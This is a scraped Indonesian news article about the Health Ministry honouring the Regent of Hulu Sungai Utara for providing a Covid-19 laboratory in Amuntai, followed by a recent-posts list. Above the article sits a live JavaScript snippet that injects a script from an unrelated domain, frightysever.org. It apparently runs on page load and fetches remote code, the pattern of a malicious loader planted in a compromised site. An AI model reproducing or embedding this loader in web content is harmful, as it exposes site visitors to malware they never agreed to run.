(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Sediakan Faskes Khusus Covid-19, Bupati HSU Terima Penghargaan dari Kemenkes


KANALKALIMANTAN.COM, AMUNTAI – Bupati Hulu Sungai Utara (HSU) Abdul Wahid mendapatkan penghargaan dari Kementerian Kesehatan (Kemenkes) RI melalui Direktorat Jenderal Pencegahan dan Pengendalian Penyakit.

Penghargaan berupa piagam penghargaan tersebut diserahkan langsung Kepala Balai Besar Tehnik Kesehatan Lingkungan dan Pengendalian Penyakit (BBTKLPP) Banjarbaru Slamet Mulsiswanto saat kunjungan ke Amuntai, Senin (9/11/2020).

Penghargaan tersebut merupakan apresiasi Kemenkes atas upaya Pamkab HSU dalam penanganan Covid-19 di daerah terkhusus dukungan Bupati HSU dalam pengadaan laboratorium pemeriksaan Covid -19 di RSUD Pembalah Batung Amuntai.

“Penghargaan ini merupakan penghargaan yang kedua yang diberikan Kementeriaan Kesehatan Republik Indonesia atas upaya atau keseriusan daerah dalam menangani Covid-19,” ujar Slamet.

 

Sementara itu, RSUD Pembalah Batung Amuntai sendiri diketahui merupakan rumah sakit milik pemerintah yang memiliki laboratorium Covid-19 yang pertama dan satu-satunya di Banua Anam.

Menurut Slamet Mulsiswanto, piagam penghargaan ini merupakan bukti keseriusan Pemkab HSU dalam penanganan Covid-19 di HSU.

“Khusus Hulu Sungai Utara, Kementerian Kesehatan memberikan penghargaan atas upaya menyediakan laboratorium Covid-19 hal ini bukti keseriusan dan kerja maksimal HSU, dalam hal ini dukungan yang diberikan Bupati HSU atas tersedianya fasilitas kesehatan berupa laboratorium Covid 19 tersebut,” bebernya.

Slamet mengharapkan dalam pelaksanaan pemanfaatan fasilitas kesehatan (Faskes ) tersebut agar memperhatikan hal-hal lain yang berkenaan dengan tindak lanjut penanganan Covid-19 agar usaha tersebut dapat maksimal.

“Saya berharap kalau nantinya melaksanakan pemeriksaan dengan melakukan swab tentunya harus ada penguatan terkait dengan pendidikan epedemilogi, hendaknya dengan adanya faskes Covid-19 ini kita juga harus melakukan penguatan di Puskesmas dan di Dinas Kesehatan karena semakin bagus penelusurannya dan testingnya akan menghasilkan lebih baik,” katanya

Selain itu, Slamet menambahkan, untuk pengambilan sampel hendaklah daerah melakukan sistem prioritas, jangan asal-asalan, hal ini tentunya akan menghemat anggaran.

“Kita ketahui saat ini anggaran keuangan untuk menangani Covid-19 di daerah mulai sedikit bahkan ada beberapa daerah yg meminta anggaran ke pusat,” imbuhnya.

Sementara itu, Bupati HSU H Abdul Wahid HK menuturkan, upaya yang telah dilakukan untuk menangani Covid-19 tidak main-main baik di awal pandemi hingga sampai saat ini.

“Alhamdullillah atas usaha-usaha yang telah dilakukan selama ini, Kementerian Kesehatan telah memberikan perhatian dengan memberikan penghargaan,” ujar Bupati HSU.

“Kami bersyukur dan berterima kasih atas kontribusi dan dukungan yang telah diberikan kepada daerah kami selama ini, akhirnya kami tetap berharap seluruh masyarakat agar tetap mematuhi protokol kesehatan dalam beraktifitas sehari hari semoga kita terbebas dari pandemi ini,” pungkasnya. (kanalkalimantan.com/dew)

Reporter : Dew
Editor : Bie

Al Ghifari

Recent Posts

Hidup Makin Tenang, Hadapi Risiko dengan Asuransi Pelita dari BRI Life

KANALKALIMANTAN.COM, - Asuransi merupakan salah satu bentuk perlindungan yang perlu dimiliki setiap orang. Dengan memiliki… Read More

11 jam ago

10 Mei Hari Lupus Sedunia, Yuk Kenali Penyakit Lupus

KANALKALIMANTAN.COM - Peringatan Hari Lupus Sedunia ini diadakan pada tanggal 10 Mei setiap tahunnya. Hari… Read More

11 jam ago

Teror Buaya Muara di Pelambuan, Warga Diminta Jauhi Sungai

KANALKALIMANTAN.COM, BANJARMASIN - Buaya yang kerap muncul di Sungai Pelambuan, Kecamatan Banjarmasin Barat, Kota Banjarmasin,… Read More

12 jam ago

Satgas Distribusi Material ke Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pelaksaanan program TNI Manunggal Membangun Desa (TMMD) ke-120 Kodim 1001/HSU-BLG di Desa… Read More

15 jam ago

Yakin ‘Pemilik’ 13 Kursi Golkar, Acil Odah Lamar Nasdem Koalisi di Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Hj Raudatul Jannah atau Acil Odah siap ramaikan kontestasi Pemilihan Kepala Daerah… Read More

18 jam ago

Musrenbang RPJPD 2025-2045, Bahas Rencana Program HSU 20 Tahun ke Depan

KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten Hulu Sungai Utara melaksanakan Musyawarah Perencanaan Pembangunan (Musrenbang) Rencana Pembangunan… Read More

18 jam ago

This website uses cookies.